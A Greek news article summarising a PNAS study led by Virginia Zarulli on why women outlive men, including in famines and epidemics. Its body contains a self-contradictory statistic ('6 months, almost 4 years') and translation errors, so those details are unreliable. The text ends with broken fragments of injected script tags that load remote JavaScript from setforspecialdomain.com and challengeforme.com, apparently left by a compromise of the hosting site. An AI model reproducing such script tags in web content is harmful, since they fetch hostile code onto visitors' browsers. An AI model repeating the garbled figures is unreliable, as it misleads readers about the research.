Έρευνα: Γιατί οι γυναίκες ζουν περισσότερο από τους άντρες;

Αποτέλεσμα εικόνας για γυναικες με ανδρες

Το αυξημένο προσδόκιμο ζωής των γυναικών οφείλεται στο ότι τείνουν να έχουν πλεονέκτημα επιβίωσης στη βρεφική ηλικία παρά στην ενήλικο ζωή

Οι γυναίκες είναι βιολογικά ισχυρότερες από τους άντρες και τείνουν να ζουν περισσότερο, ανακάλυψε νέα έρευνα.

Τα ευρήματα έδειξαν ότι οι γυναίκες όχι μόνο ζουν περισσότερο σε φυσιολογικούς καιρούς αλλά επίσης είναι και πιο πιθανό να επιζούν ακόμα και στις χειρότερες περιστάσεις, όπως πείνα και επιδημία.

Σε δύσκολους καιρούς τα νεογέννητα κορίτσια είναι πιο πιθανό να επιζούν σε σχέση με τα αγόρια.

Ωστόσο ακόμα και όταν η θνησιμότητα ήταν πολύ υψηλή για τα 2 φύλα οι γυναίκες ζούσαν περισσότερο από τους άντρες κατά 6 μήνες, σχεδόν 4 χρόνια κατά μέσον όρο.

Αυτό το πλεονέκτημα στις γυναίκες μπορεί ενδεχομένως να οφείλεται σε μεγάλο βαθμό σε βιολογικούς παράγοντες, όπως είναι οι γενετικοί ή οι ορμόνες, ιδιαίτερα οιστρογόνα που ενισχύουν την άμυνα έναντι λοιμωδών νόσων.

Η Virginia Zarulli, του Duke University στο Durham, δήλωσε ότι τα ευρήματα προσθέτουν άλλο ένα κομμάτι στο παζλ των διαφορών ανάμεσα στα φύλα όσον αφορά την επιβίωση.

Στην έρευνα που δημοσιεύτηκε στο Proceedings of the National Academy of Sciences, οι ερευνητές ανέλυσαν στοιχεία θνησιμότητας που πήγαιναν πίσω 250 χρόνια για ανθρώπους των οποίων η ζωή ήταν μερικότερη λόγω πείνας ή αρρώστιας.

Τα ευρήματα περιέλαβαν 7 πληθυσμούς στους οποίους το προσδόκιμο επιβίωσης για ένα από τα 2 φύλα ήταν 20 χρόνια ή λιγότερα και ανακάλυψαν ότι τα νεογέννητα κορίτσια είναι πιο ανθεκτικά λόγω βιολογικών παραγόντων.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>